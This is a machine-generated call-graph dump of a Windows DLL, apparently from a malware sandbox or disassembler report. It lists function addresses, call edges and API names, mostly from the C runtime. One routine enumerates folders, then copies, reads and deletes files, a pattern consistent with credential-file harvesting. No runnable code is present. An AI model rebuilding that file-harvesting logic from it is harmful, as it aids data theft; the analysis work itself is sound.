10008c7b RtlEnterCriticalSection 6865->6884 6869 10006368 __dosmaperr 20 API calls 6866->6869 6867->6830 6871 10009af9 6869->6871 6870 10009a89 6872 10009aa5 6870->6872 6873 10009aba 6870->6873 6874 100062ac _abort 26 API calls 6871->6874 6875 10006368 __dosmaperr 20 API calls 6872->6875 6885 10009b0d 6873->6885 6874->6867 6877 10009aaa 6875->6877 6879 10006355 __dosmaperr 20 API calls 6877->6879 6878 10009ab5 6936 10009ae4 6878->6936 6879->6878 6882 10005b7a _abort 20 API calls 6881->6882 6883 1000635a 6882->6883 6883->6864 6884->6870 6886 10009b34 6885->6886 6887 10009b3b 6885->6887 6890 10002ada _ValidateLocalCookies 5 API calls 6886->6890 6888 10009b5e 6887->6888 6889 10009b3f 6887->6889 6892 10009baf 6888->6892 6893 10009b92 6888->6893 6891 10006355 __dosmaperr 20 API calls 6889->6891 6894 10009d15 6890->6894 6895 10009b44 6891->6895 6897 10009bc5 6892->6897 6939 1000a00b 6892->6939 6896 10006355 __dosmaperr 20 API calls 6893->6896 6894->6878 6898 10006368 __dosmaperr 20 API calls 6895->6898 6902 10009b97 6896->6902 6942 100096b2 6897->6942 6900 10009b4b 6898->6900 6903 100062ac _abort 26 API calls 6900->6903 6905 10006368 __dosmaperr 20 API calls 6902->6905 6903->6886 6908 10009b9f 6905->6908 6906 10009bd3 6909 10009bf9 6906->6909 6916 10009bd7 6906->6916 6907 10009c0c 6911 10009c20 6907->6911 6912 10009c66 WriteFile 6907->6912 6910 100062ac _abort 26 API calls 6908->6910 6954 10009492 GetConsoleCP 6909->6954 6910->6886 6913 10009c56 6911->6913 6914 10009c28 6911->6914 6918 10009c89 GetLastError 6912->6918 6923 10009bef 6912->6923 6980 10009728 6913->6980 6919 10009c46 6914->6919 6920 10009c2d 6914->6920 6915 10009ccd 6915->6886 6925 10006368 __dosmaperr 20 API calls 6915->6925 6916->6915 6949 10009645 6916->6949 6918->6923 6972 100098f5 6919->6972 6920->6915 6965 10009807 6920->6965 6923->6886 6923->6915 6926 10009ca9 6923->6926 6928 10009cf2 6925->6928 6930 10009cb0 6926->6930 6931 10009cc4 6926->6931 6929 10006355 __dosmaperr 20 API calls 6928->6929 6929->6886 6932 10006368 __dosmaperr 20 API calls 6930->6932 6987 10006332 6931->6987 6934 10009cb5 6932->6934 6935 10006355 __dosmaperr 20 API calls 6934->6935 6935->6886 7028 10008c9e RtlLeaveCriticalSection 6936->7028 6938 10009aea 6938->6867 6992 10009f8d 6939->6992 7014 10008dbc 6942->7014 6944 100096c2 6945 100096c7 6944->6945 6946 10005af6 _abort 38 API calls 6944->6946 6945->6906 6945->6907 6947 100096ea 6946->6947 6947->6945 6948 10009708 GetConsoleMode 6947->6948 6948->6945 6950 1000969f 6949->6950 6953 1000966a 6949->6953 6950->6923 6951 1000a181 WriteConsoleW CreateFileW 6951->6953 6952 100096a1 GetLastError 6952->6950 6953->6950 6953->6951 6953->6952 6958 100094f5 6954->6958 6964 10009607 6954->6964 6955 10002ada _ValidateLocalCookies 5 API calls 6956 10009641 6955->6956 6956->6923 6959 1000957b WideCharToMultiByte 6958->6959 6961 100079e6 40 API calls __fassign 6958->6961 6963 100095d2 WriteFile 6958->6963 6958->6964 7023 10007c19 6958->7023 6960 100095a1 WriteFile 6959->6960 6959->6964 6960->6958 6962 1000962a GetLastError 6960->6962 6961->6958 6962->6964 6963->6958 6963->6962 6964->6955 6967 10009816 6965->6967 6966 100098d8 6969 10002ada _ValidateLocalCookies 5 API calls 6966->6969 6967->6966 6968 10009894 WriteFile 6967->6968 6968->6967 6970 100098da GetLastError 6968->6970 6971 100098f1 6969->6971 6970->6966 6971->6923 6979 10009904 6972->6979 6973 10009a0f 6974 10002ada _ValidateLocalCookies 5 API calls 6973->6974 6976 10009a1e 6974->6976 6975 10009986 WideCharToMultiByte 6977 10009a07 GetLastError 6975->6977 6978 100099bb WriteFile 6975->6978 6976->6923 6977->6973 6978->6977 6978->6979 6979->6973 6979->6975 6979->6978 6985 10009737 6980->6985 6981 100097ea 6982 10002ada _ValidateLocalCookies 5 API calls 6981->6982 6984 10009803 6982->6984 6983 100097a9 WriteFile 6983->6985 6986 100097ec GetLastError 6983->6986 6984->6923 6985->6981 6985->6983 6986->6981 6988 10006355 __dosmaperr 20 API calls 6987->6988 6989 1000633d __dosmaperr 6988->6989 6990 10006368 __dosmaperr 20 API calls 6989->6990 6991 10006350 6990->6991 6991->6886 7001 10008d52 6992->7001 6994 10009f9f 6995 10009fa7 6994->6995 6996 10009fb8 SetFilePointerEx 6994->6996 6999 10006368 __dosmaperr 20 API calls 6995->6999 6997 10009fd0 GetLastError 6996->6997 6998 10009fac 6996->6998 7000 10006332 __dosmaperr 20 API calls 6997->7000 6998->6897 6999->6998 7000->6998 7002 10008d74 7001->7002 7003 10008d5f 7001->7003 7006 10006355 __dosmaperr 20 API calls 7002->7006 7008 10008d99 7002->7008 7004 10006355 __dosmaperr 20 API calls 7003->7004 7005 10008d64 7004->7005 7007 10006368 __dosmaperr 20 API calls 7005->7007 7009 10008da4 7006->7009 7010 10008d6c 7007->7010 7008->6994 7011 10006368 __dosmaperr 20 API calls 7009->7011 7010->6994 7012 10008dac 7011->7012 7013 100062ac _abort 26 API calls 7012->7013 7013->7010 7015 10008dd6 7014->7015 7016 10008dc9 7014->7016 7018 10008de2 7015->7018 7019 10006368 __dosmaperr 20 API calls 7015->7019 7017 10006368 __dosmaperr 20 API calls 7016->7017 7020 10008dce 7017->7020 7018->6944 7021 10008e03 7019->7021 7020->6944 7022 100062ac _abort 26 API calls 7021->7022 7022->7020 7024 10005af6 _abort 38 API calls 7023->7024 7025 10007c24 7024->7025 7026 10007a00 __fassign 38 API calls 7025->7026 7027 10007c34 7026->7027 7027->6958 7028->6938 7032 1000ad24 7029->7032 7031 1000adca 7031->6853 7033 1000ad30 ___scrt_is_nonwritable_in_current_image 7032->7033 7043 10008c7b RtlEnterCriticalSection 7033->7043 7035 1000ad3e 7036 1000ad70 7035->7036 7037 1000ad65 7035->7037 7039 10006368 __dosmaperr 20 API calls 7036->7039 7044 1000ae4d 7037->7044 7040 1000ad6b 7039->7040 7059 1000ad9a 7040->7059 7042 1000ad8d _abort 7042->7031 7043->7035 7045 10008d52 26 API calls 7044->7045 7046 1000ae5d 7045->7046 7047 1000ae63 7046->7047 7049 1000ae95 7046->7049 7052 10008d52 26 API calls 7046->7052 7062 10008cc1 7047->7062 7049->7047 7050 10008d52 26 API calls 7049->7050 7054 1000aea1 CloseHandle 7050->7054 7053 1000ae8c 7052->7053 7056 10008d52 26 API calls 7053->7056 7054->7047 7057 1000aead GetLastError 7054->7057 7055 1000aedd 7055->7040 7056->7049 7057->7047 7058 10006332 __dosmaperr 20 API calls 7058->7055 7071 10008c9e RtlLeaveCriticalSection 7059->7071 7061 1000ada4 7061->7042 7063 10008cd0 7062->7063 7064 10008d37 7062->7064 7063->7064 7069 10008cfa 7063->7069 7065 10006368 __dosmaperr 20 API calls 7064->7065 7066 10008d3c 7065->7066 7067 10006355 __dosmaperr 20 API calls 7066->7067 7068 10008d27 7067->7068 7068->7055 7068->7058 7069->7068 7070 10008d21 SetStdHandle 7069->7070 7070->7068 7071->7061 7072->6827 7073->6807 7074 10002049 7075 10002055 ___scrt_is_nonwritable_in_current_image 7074->7075 7076 100020d3 7075->7076 7077 1000207d 7075->7077 7087 1000205e 7075->7087 7078 10002639 ___scrt_fastfail 4 API calls 7076->7078 7088 1000244c 7077->7088 7080 100020da 7078->7080 7081 10002082 7097 10002308 7081->7097 7083 10002087 __RTC_Initialize 7100 100020c4 7083->7100 7085 1000209f 7103 1000260b 7085->7103 7089 10002451 ___scrt_release_startup_lock 7088->7089 7090 10002461 7089->7090 7091 10002455 7089->7091 7094 1000246e 7090->7094 7095 1000499b _abort 28 API calls 7090->7095 7092 1000527a _abort 20 API calls 7091->7092 7093 1000245f 7092->7093 7093->7081 7094->7081 7096 10004bbd 7095->7096 7096->7081 7109 100034c7 RtlInterlockedFlushSList 7097->7109 7099 10002312 7099->7083 7111 1000246f 7100->7111 7102 100020c9 ___scrt_release_startup_lock 7102->7085 7104 10002617 7103->7104 7105 1000262d 7104->7105 7130 100053ed 7104->7130 7105->7087 7108 10003529 ___vcrt_uninitialize 8 API calls 7108->7105 7110 100034d7 7109->7110 7110->7099 7116 100053ff 7111->7116 7114 1000391b ___vcrt_uninitialize_ptd 6 API calls 7115 1000354d 7114->7115 7115->7102 7119 10005c2b 7116->7119 7120 10005c35 7119->7120 7122 10002476 7119->7122 7123 10005db2 7120->7123 7122->7114 7124 10005c45 _abort 5 API calls 7123->7124 7125 10005dd9 7124->7125 7126 10005df1 TlsFree 7125->7126 7127 10005de5 7125->7127 7126->7127 7128 10002ada _ValidateLocalCookies 5 API calls 7127->7128 7129 10005e02 7128->7129 7129->7122 7133 100074da 7130->7133 7136 100074f3 7133->7136 7134 10002ada _ValidateLocalCookies 5 API calls 7135 10002625 7134->7135 7135->7108 7136->7134 7270 10008a89 7273 10006d60 7270->7273 7274 10006d69 7273->7274 7275 10006d72 7273->7275 7277 10006c5f 7274->7277 7278 10005af6 _abort 38 API calls 7277->7278 7279 10006c6c 7278->7279 7280 10006d7e __fassign 38 API calls 7279->7280 7281 10006c74 7280->7281 7297 100069f3 7281->7297 7284 10006c8b 7284->7275 7287 10006cce 7290 1000571e _free 20 API calls 7287->7290 7290->7284 7291 10006cc9 7292 10006368 __dosmaperr 20 API calls 7291->7292 7292->7287 7293 10006d12 7293->7287 7321 100068c9 7293->7321 7294 10006ce6 7294->7293 7295 1000571e _free 20 API calls 7294->7295 7295->7293 7298 100054a7 __fassign 38 API calls 7297->7298 7299 10006a05 7298->7299 7300 10006a14 GetOEMCP 7299->7300 7301 10006a26 7299->7301 7303 10006a3d 7300->7303 7302 10006a2b GetACP 7301->7302 7301->7303 7302->7303 7303->7284 7304 100056d0 7303->7304 7305 1000570e 7304->7305 7309 100056de _abort 7304->7309 7306 10006368 __dosmaperr 20 API calls 7305->7306 7308 1000570c 7306->7308 7307 100056f9 RtlAllocateHeap 7307->7308 7307->7309 7308->7287 7311 10006e20 7308->7311 7309->7305 7309->7307 7310 1000474f _abort 7 API calls 7309->7310 7310->7309 7312 100069f3 40 API calls 7311->7312 7313 10006e3f 7312->7313 7316 10006e90 IsValidCodePage 7313->7316 7318 10006e46 7313->7318 7320 10006eb5 ___scrt_fastfail 7313->7320 7314 10002ada _ValidateLocalCookies 5 API calls 7315 10006cc1 7314->7315 7315->7291 7315->7294 7317 10006ea2 GetCPInfo 7316->7317 7316->7318 7317->7318 7317->7320 7318->7314 7324 10006acb GetCPInfo 7320->7324 7397 10006886 7321->7397 7323 100068ed 7323->7287 7330 10006b05 7324->7330 7333 10006baf 7324->7333 7327 10002ada _ValidateLocalCookies 5 API calls 7329 10006c5b 7327->7329 7329->7318 7334 100086e4 7330->7334 7332 10008a3e 43 API calls 7332->7333 7333->7327 7335 100054a7 __fassign 38 API calls 7334->7335 7336 10008704 MultiByteToWideChar 7335->7336 7338 10008742 7336->7338 7339 100087da 7336->7339 7341 100056d0 21 API calls 7338->7341 7344 10008763 ___scrt_fastfail 7338->7344 7340 10002ada _ValidateLocalCookies 5 API calls 7339->7340 7342 10006b66 7340->7342 7341->7344 7348 10008a3e 7342->7348 7343 100087d4 7353 10008801 7343->7353 7344->7343 7346 100087a8 MultiByteToWideChar 7344->7346 7346->7343 7347 100087c4 GetStringTypeW 7346->7347 7347->7343 7349 100054a7 __fassign 38 API calls 7348->7349 7350 10008a51 7349->7350 7357 10008821 7350->7357 7354 1000880d 7353->7354 7355 1000881e 7353->7355 7354->7355 7356 1000571e _free 20 API calls 7354->7356 7355->7339 7356->7355 7359 1000883c 7357->7359 7358 10008862 MultiByteToWideChar 7360 1000888c 7358->7360 7371 10008a16 7358->7371 7359->7358 7365 100056d0 21 API calls 7360->7365 7367 100088ad 7360->7367 7361 10002ada _ValidateLocalCookies 5 API calls 7362 10006b87 7361->7362 7362->7332 7363 100088f6 MultiByteToWideChar 7364 10008962 7363->7364 7366 1000890f 7363->7366 7369 10008801 __freea 20 API calls 7364->7369 7365->7367 7384 10005f19 7366->7384 7367->7363 7367->7364 7369->7371 7371->7361 7372 10008971 7374 100056d0 21 API calls 7372->7374 7377 10008992 7372->7377 7373 10008939 7373->7364 7375 10005f19 11 API calls 7373->7375 7374->7377 7375->7364 7376 10008a07 7379 10008801 __freea 20 API calls 7376->7379 7377->7376 7378 10005f19 11 API calls 7377->7378 7380 100089e6 7378->7380 7379->7364 7380->7376 7381 100089f5 WideCharToMultiByte 7380->7381 7381->7376 7382 10008a35 7381->7382 7383 10008801 __freea 20 API calls 7382->7383 7383->7364 7385 10005c45 _abort 5 API calls 7384->7385 7386 10005f40 7385->7386 7389 10005f49 7386->7389 7392 10005fa1 7386->7392 7390 10002ada _ValidateLocalCookies 5 API calls 7389->7390 7391 10005f9b 7390->7391 7391->7364 7391->7372 7391->7373 7393 10005c45 _abort 5 API calls 7392->7393 7394 10005fc8 7393->7394 7395 10002ada _ValidateLocalCookies 5 API calls 7394->7395 7396 10005f89 LCMapStringW 7395->7396 7396->7389 7398 10006892 ___scrt_is_nonwritable_in_current_image 7397->7398 7405 10005671 RtlEnterCriticalSection 7398->7405 7400 1000689c 7406 100068f1 7400->7406 7404 100068b5 _abort 7404->7323 7405->7400 7418 10007011 7406->7418 7408 1000693f 7409 10007011 26 API calls 7408->7409 7410 1000695b 7409->7410 7411 10007011 26 API calls 7410->7411 7412 10006979 7411->7412 7413 100068a9 7412->7413 7414 1000571e _free 20 API calls 7412->7414 7415 100068bd 7413->7415 7414->7413 7432 100056b9 RtlLeaveCriticalSection 7415->7432 7417 100068c7 7417->7404 7419 10007022 7418->7419 7428 1000701e 7418->7428 7420 10007029 7419->7420 7424 1000703c ___scrt_fastfail 7419->7424 7421 10006368 __dosmaperr 20 API calls 7420->7421 7422 1000702e 7421->7422 7423 100062ac _abort 26 API calls 7422->7423 7423->7428 7425 10007073 7424->7425 7426 1000706a 7424->7426 7424->7428 7425->7428 7430 10006368 __dosmaperr 20 API calls 7425->7430 7427 10006368 __dosmaperr 20 API calls 7426->7427 7429 1000706f 7427->7429 7428->7408 7431 100062ac _abort 26 API calls 7429->7431 7430->7429 7431->7428 7432->7417 6106 1000220c 6107 10002215 6106->6107 6108 1000221a dllmain_dispatch 6106->6108 6110 100022b1 6107->6110 6111 100022c7 6110->6111 6113 100022d0 6111->6113 6114 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6111->6114 6113->6108 6114->6113 7137 1000724e GetProcessHeap 7138 1000284f 7139 10002882 std::exception::exception 27 API calls 7138->7139 7140 1000285d 7139->7140 7437 10003c90 RtlUnwind 7535 100036d0 7536 100036e2 7535->7536 7538 100036f0 @_EH4_CallFilterFunc@8 7535->7538 7537 10002ada _ValidateLocalCookies 5 API calls 7536->7537 7537->7538 7141 10005351 7142 10005360 7141->7142 7143 10005374 7141->7143 7142->7143 7146 1000571e _free 20 API calls 7142->7146 7144 1000571e _free 20 API calls 7143->7144 7145 10005386 7144->7145 7147 1000571e _free 20 API calls 7145->7147 7146->7143 7148 10005399 7147->7148 7149 1000571e _free 20 API calls 7148->7149 7150 100053aa 7149->7150 7151 1000571e _free 20 API calls 7150->7151 7152 100053bb 7151->7152 7539 100073d5 7540 100073e1 ___scrt_is_nonwritable_in_current_image 7539->7540 7551 10005671 RtlEnterCriticalSection 7540->7551 7542 100073e8 7543 10008be3 27 API calls 7542->7543 7544 100073f7 7543->7544 7550 10007406 7544->7550 7552 10007269 GetStartupInfoW 7544->7552 7549 10007417 _abort 7563 10007422 7550->7563 7551->7542 7553 10007286 7552->7553 7554 10007318 7552->7554 7553->7554 7555 10008be3 27 API calls 7553->7555 7558 1000731f 7554->7558 7556 100072af 7555->7556 7556->7554 7557 100072dd GetFileType 7556->7557 7557->7556 7560 10007326 7558->7560 7559 10007369 GetStdHandle 7559->7560 7560->7559 7561 100073d1 7560->7561 7562 1000737c GetFileType 7560->7562 7561->7550 7562->7560 7566 100056b9 RtlLeaveCriticalSection 7563->7566 7565 10007429 7565->7549 7566->7565 7567 10004ed7 7568 10006d60 51 API calls 7567->7568 7569 10004ee9 7568->7569 7578 10007153 GetEnvironmentStringsW 7569->7578 7572 10004ef4 7574 1000571e _free 20 API calls 7572->7574 7575 10004f29 7574->7575 7576 10004eff 7577 1000571e _free 20 API calls 7576->7577 7577->7572 7579 1000716a 7578->7579 7589 100071bd 7578->7589 7580 10007170 WideCharToMultiByte 7579->7580 7583 1000718c 7580->7583 7580->7589 7581 100071c6 FreeEnvironmentStringsW 7582 10004eee 7581->7582 7582->7572 7590 10004f2f 7582->7590 7584 100056d0 21 API calls 7583->7584 7585 10007192 7584->7585 7586 100071af 7585->7586 7587 10007199 WideCharToMultiByte 7585->7587 7588 1000571e _free 20 API calls 7586->7588 7587->7586 7588->7589 7589->7581 7589->7582 7591 10004f44 7590->7591 7592 1000637b _abort 20 API calls 7591->7592 7596 10004f6b 7592->7596 7593 1000571e _free 20 API calls 7595 10004fe9 7593->7595 7594 10004fcf 7594->7593 7595->7576 7596->7594 7597 1000637b _abort 20 API calls 7596->7597 7598 10004fd1 7596->7598 7599 1000544d ___std_exception_copy 26 API calls 7596->7599 7602 10004ff3 7596->7602 7605 1000571e _free 20 API calls 7596->7605 7597->7596 7600 10005000 20 API calls 7598->7600 7599->7596 7601 10004fd7 7600->7601 7603 1000571e _free 20 API calls 7601->7603 7604 100062bc _abort 11 API calls 7602->7604 7603->7594 7606 10004fff 7604->7606 7605->7596 6115 10002418 6116 10002420 ___scrt_release_startup_lock 6115->6116 6119 100047f5 6116->6119 6118 10002448 6120 10004804 6119->6120 6121 10004808 6119->6121 6120->6118 6124 10004815 6121->6124 6125 10005b7a _abort 20 API calls 6124->6125 6128 1000482c 6125->6128 6126 10002ada _ValidateLocalCookies 5 API calls 6127 10004811 6126->6127 6127->6118 6128->6126 7438 10004a9a 7441 10005411 7438->7441 7442 1000541d _abort 7441->7442 7443 10005af6 _abort 38 API calls 7442->7443 7446 10005422 7443->7446 7444 100055a8 _abort 38 API calls 7445 1000544c 7444->7445 7446->7444 5857 10001c5b 5858 10001c6b ___scrt_fastfail 5857->5858 5861 100012ee 5858->5861 5860 10001c87 5862 10001324 ___scrt_fastfail 5861->5862 5863 100013b7 GetEnvironmentVariableW 5862->5863 5887 100010f1 5863->5887 5866 100010f1 57 API calls 5867 10001465 5866->5867 5868 100010f1 57 API calls 5867->5868 5869 10001479 5868->5869 5870 100010f1 57 API calls 5869->5870 5871 1000148d 5870->5871 5872 100010f1 57 API calls 5871->5872 5873 100014a1 5872->5873 5874 100010f1 57 API calls 5873->5874 5875 100014b5 lstrlenW 5874->5875 5876 100014d2 5875->5876 5877 100014d9 lstrlenW 5875->5877 5876->5860 5878 100010f1 57 API calls 5877->5878 5879 10001501 lstrlenW lstrcatW 5878->5879 5880 100010f1 57 API calls 5879->5880 5881 10001539 lstrlenW lstrcatW 5880->5881 5882 100010f1 57 API calls 5881->5882 5883 1000156b lstrlenW lstrcatW 5882->5883 5884 100010f1 57 API calls 5883->5884 5885 1000159d lstrlenW lstrcatW 5884->5885 5886 100010f1 57 API calls 5885->5886 5886->5876 5888 10001118 ___scrt_fastfail 5887->5888 5889 10001129 lstrlenW 5888->5889 5900 10002c40 5889->5900 5891 10001148 lstrcatW lstrlenW 5892 10001177 lstrlenW FindFirstFileW 5891->5892 5893 10001168 lstrlenW 5891->5893 5894 100011a0 5892->5894 5895 100011e1 5892->5895 5893->5892 5896 100011c7 FindNextFileW 5894->5896 5899 100011aa 5894->5899 5895->5866 5896->5894 5897 100011da FindClose 5896->5897 5897->5895 5899->5896 5902 10001000 5899->5902 5901 10002c57 5900->5901 5901->5891 5901->5901 5903 10001022 ___scrt_fastfail 5902->5903 5904 100010af 5903->5904 5905 1000102f lstrcatW lstrlenW 5903->5905 5906 100010b5 lstrlenW 5904->5906 5907 100010ad 5904->5907 5908 1000105a lstrlenW 5905->5908 5909 1000106b lstrlenW 5905->5909 5933 10001e16 5906->5933 5907->5899 5908->5909 5919 10001e89 lstrlenW 5909->5919 5912 10001088 GetFileAttributesW 5912->5907 5914 1000109c 5912->5914 5913 100010ca 5913->5907 5915 10001e89 5 API calls 5913->5915 5914->5907 5925 1000173a 5914->5925 5917 100010df 5915->5917 5938 100011ea 5917->5938 5920 10002c40 ___scrt_fastfail 5919->5920 5921 10001ea7 lstrcatW lstrlenW 5920->5921 5922 10001ed1 lstrcatW 5921->5922 5923 10001ec2 5921->5923 5922->5912 5923->5922 5924 10001ec7 lstrlenW 5923->5924 5924->5922 5926 10001747 ___scrt_fastfail 5925->5926 5953 10001cca 5926->5953 5930 1000199f 5930->5907 5931 10001824 ___scrt_fastfail _strlen 5931->5930 5973 100015da 5931->5973 5934 10001e29 5933->5934 5937 10001e4c 5933->5937 5935 10001e2d lstrlenW 5934->5935 5934->5937 5936 10001e3f lstrlenW 5935->5936 5935->5937 5936->5937 5937->5913 5939 1000120e ___scrt_fastfail 5938->5939 5940 10001e89 5 API calls 5939->5940 5941 10001220 GetFileAttributesW 5940->5941 5942 10001235 5941->5942 5943 10001246 5941->5943 5942->5943 5945 1000173a 35 API calls 5942->5945 5944 10001e89 5 API calls 5943->5944 5946 10001258 5944->5946 5945->5943 5947 100010f1 56 API calls 5946->5947 5948 1000126d 5947->5948 5949 10001e89 5 API calls 5948->5949 5950 1000127f ___scrt_fastfail 5949->5950 5951 100010f1 56 API calls 5950->5951 5952 100012e6 5951->5952 5952->5907 5954 10001cf1 ___scrt_fastfail 5953->5954 5955 10001d0f CopyFileW CreateFileW 5954->5955 5956 10001d44 DeleteFileW 5955->5956 5957 10001d55 GetFileSize 5955->5957 5962 10001808 5956->5962 5958 10001ede 22 API calls 5957->5958 5959 10001d66 ReadFile 5958->5959 5960 10001d94 CloseHandle DeleteFileW 5959->5960 5961 10001d7d CloseHandle DeleteFileW 5959->5961 5960->5962 5961->5962 5962->5930 5963 10001ede 5962->5963 5965 1000222f 5963->5965 5966 1000224e 5965->5966 5969 10002250 5965->5969 5981 1000474f 5965->5981 5986 100047e5 5965->5986 5966->5931 5968 10002908 5970 100035d2 __CxxThrowException@8 RaiseException 5968->5970 5969->5968 5993 100035d2 5969->5993 5971 10002925 5970->5971 5971->5931 5974 1000160c _strcat _strlen 5973->5974 5975 1000163c lstrlenW 5974->5975 6081 10001c9d 5975->6081 5977 10001655 lstrcatW lstrlenW 5978 10001678 5977->5978 5979 10001693 ___scrt_fastfail 5978->5979 5980 1000167e lstrcatW 5978->5980 5979->5931 5980->5979 5996 10004793 5981->5996 5984 1000478f 5984->5965 5985 10004765 6002 10002ada 5985->6002 5991 100056d0 _abort 5986->5991 5987 1000570e 6015 10006368 5987->6015 5989 100056f9 RtlAllocateHeap 5990 1000570c 5989->5990 5989->5991 5990->5965 5991->5987 5991->5989 5992 1000474f _abort 7 API calls 5991->5992 5992->5991 5995 100035f2 RaiseException 5993->5995 5995->5968 5997 1000479f ___scrt_is_nonwritable_in_current_image 5996->5997 6009 10005671 RtlEnterCriticalSection 5997->6009 5999 100047aa 6010 100047dc 5999->6010 6001 100047d1 _abort 6001->5985 6003 10002ae3 6002->6003 6004 10002ae5 IsProcessorFeaturePresent 6002->6004 6003->5984 6006 10002b58 6004->6006 6014 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6006->6014 6008 10002c3b 6008->5984 6009->5999 6013 100056b9 RtlLeaveCriticalSection 6010->6013 6012 100047e3 6012->6001 6013->6012 6014->6008 6018 10005b7a GetLastError 6015->6018 6019 10005b93 6018->6019 6020 10005b99 6018->6020 6037 10005e08 6019->6037 6025 10005bf0 SetLastError 6020->6025 6044 1000637b 6020->6044 6024 10005bb3 6051 1000571e 6024->6051 6026 10005bf9 6025->6026 6026->5990 6030 10005bb9 6032 10005be7 SetLastError 6030->6032 6031 10005bcf 6064 1000593c 6031->6064 6032->6026 6035 1000571e _free 17 API calls 6036 10005be0 6035->6036 6036->6025 6036->6032 6069 10005c45 6037->6069 6039 10005e2f 6040 10005e47 TlsGetValue 6039->6040 6041 10005e3b 6039->6041 6040->6041 6042 10002ada _ValidateLocalCookies 5 API calls 6041->6042 6043 10005e58 6042->6043 6043->6020 6049 10006388 _abort 6044->6049 6045 100063c8 6048 10006368 __dosmaperr 19 API calls 6045->6048 6046 100063b3 RtlAllocateHeap 6047 10005bab 6046->6047 6046->6049 6047->6024 6057 10005e5e 6047->6057 6048->6047 6049->6045 6049->6046 6050 1000474f _abort 7 API calls 6049->6050 6050->6049 6052 10005729 HeapFree 6051->6052 6056 10005752 __dosmaperr 6051->6056 6053 1000573e 6052->6053 6052->6056 6054 10006368 __dosmaperr 18 API calls 6053->6054 6055 10005744 GetLastError 6054->6055 6055->6056 6056->6030 6058 10005c45 _abort 5 API calls 6057->6058 6059 10005e85 6058->6059 6060 10005ea0 TlsSetValue 6059->6060 6061 10005e94 6059->6061 6060->6061 6062 10002ada _ValidateLocalCookies 5 API calls 6061->6062 6063 10005bc8 6062->6063 6063->6024 6063->6031 6075 10005914 6064->6075 6070 10005c71 6069->6070 6071 10005c75 __crt_fast_encode_pointer 6069->6071 6070->6071 6072 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6070->6072 6074 10005c95 6070->6074 6071->6039 6072->6070 6073 10005ca1 GetProcAddress 6073->6071 6074->6071 6074->6073 6076 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6075->6076 6077 10005938 6076->6077 6078 100058c4 6077->6078 6079 10005758 _abort 20 API calls 6078->6079 6080 100058e8 6079->6080 6080->6035 6082 10001ca6 _strlen 6081->6082 6082->5977 7607 100020db 7610 100020e7 ___scrt_is_nonwritable_in_current_image 7607->7610 7608 100020f6 7609 10002110 dllmain_raw 7609->7608 7611 1000212a 7609->7611 7610->7608 7610->7609 7615 1000210b 7610->7615 7620 10001eec 7611->7620 7613 10002177 7613->7608 7614 10001eec 31 API calls 7613->7614 7616 1000218a 7614->7616 7615->7608 7615->7613 7618 10001eec 31 API calls 7615->7618 7616->7608 7617 10002193 dllmain_raw 7616->7617 7617->7608 7619 1000216d dllmain_raw 7618->7619 7619->7613 7621 10001ef7 7620->7621 7622 10001f2a dllmain_crt_process_detach 7620->7622 7624 10001f1c dllmain_crt_process_attach 7621->7624 7625 10001efc 7621->7625 7623 10001f06 7622->7623 7623->7615 7624->7623 7626 10001f01 7625->7626 7627 10001f12 7625->7627 7626->7623 7630 1000240b 7626->7630 7635 100023ec 7627->7635 7643 100053e5 7630->7643 7736 10003513 7635->7736 7638 100023f5 7638->7623 7641 10002408 7641->7623 7642 1000351e 7 API calls 7642->7638 7649 10005aca 7643->7649 7646 1000351e 7725 10003820 7646->7725 7648 10002415 7648->7623 7650 10005ad4 7649->7650 7651 10002410 7649->7651 7652 10005e08 _abort 11 API calls 7650->7652 7651->7646 7653 10005adb 7652->7653 7653->7651 7654 10005e5e _abort 11 API calls 7653->7654 7655 10005aee 7654->7655 7657 100059b5 7655->7657 7658 100059c0 7657->7658 7662 100059d0 7657->7662 7663 100059d6 7658->7663 7661 1000571e _free 20 API calls 7661->7662 7662->7651 7664 100059e9 7663->7664 7667 100059ef 7663->7667 7665 1000571e _free 20 API calls 7664->7665 7665->7667 7666 1000571e _free 20 API calls 7668 100059fb 7666->7668 7667->7666 7669 1000571e _free 20 API calls 7668->7669 7670 10005a06 7669->7670 7671 1000571e _free 20 API calls 7670->7671 7672 10005a11 7671->7672 7673 1000571e _free 20 API calls 7672->7673 7674 10005a1c 7673->7674 7675 1000571e _free 20 API calls 7674->7675 7676 10005a27 7675->7676 7677 1000571e _free 20 API calls 7676->7677 7678 10005a32 7677->7678 7679 1000571e _free 20 API calls 7678->7679 7680 10005a3d 7679->7680 7681 1000571e _free 20 API calls 7680->7681 7682 10005a48 7681->7682 7683 1000571e _free 20 API calls 7682->7683 7684 10005a56 7683->7684 7689 1000589c 7684->7689 7695 100057a8 7689->7695 7691 100058c0 7692 100058ec 7691->7692 7708 10005809 7692->7708 7694 10005910 7694->7661 7696 100057b4 ___scrt_is_nonwritable_in_current_image 7695->7696 7703 10005671 RtlEnterCriticalSection 7696->7703 7699 100057be 7700 1000571e _free 20 API calls 7699->7700 7702 100057e8 7699->7702 7700->7702 7701 100057f5 _abort 7701->7691 7704 100057fd 7702->7704 7703->7699 7707 100056b9 RtlLeaveCriticalSection 7704->7707 7706 10005807 7706->7701 7707->7706 7709 10005815 ___scrt_is_nonwritable_in_current_image 7708->7709 7716 10005671 RtlEnterCriticalSection 7709->7716 7711 1000581f 7717 10005a7f 7711->7717 7713 10005832 7721 10005848 7713->7721 7715 10005840 _abort 7715->7694 7716->7711 7718 10005ab5 __fassign 7717->7718 7719 10005a8e __fassign 7717->7719 7718->7713 7719->7718 7720 10007cc2 __fassign 20 API calls 7719->7720 7720->7718 7724 100056b9 RtlLeaveCriticalSection 7721->7724 7723 10005852 7723->7715 7724->7723 7726 1000384b ___vcrt_freefls@4 7725->7726 7728 1000382d 7725->7728 7726->7648 7727 1000383b 7730 10003ba2 ___vcrt_FlsSetValue 6 API calls 7727->7730 7728->7727 7731 10003b67 7728->7731 7730->7726 7732 10003a82 try_get_function 5 API calls 7731->7732 7733 10003b81 7732->7733 7734 10003b99 TlsGetValue 7733->7734 7735 10003b8d 7733->7735 7734->7735 7735->7727 7742 10003856 7736->7742 7738 100023f1 7738->7638 7739 100053da 7738->7739 7740 10005b7a _abort 20 API calls 7739->7740 7741 100023fd 7740->7741 7741->7641 7741->7642 7743 10003862 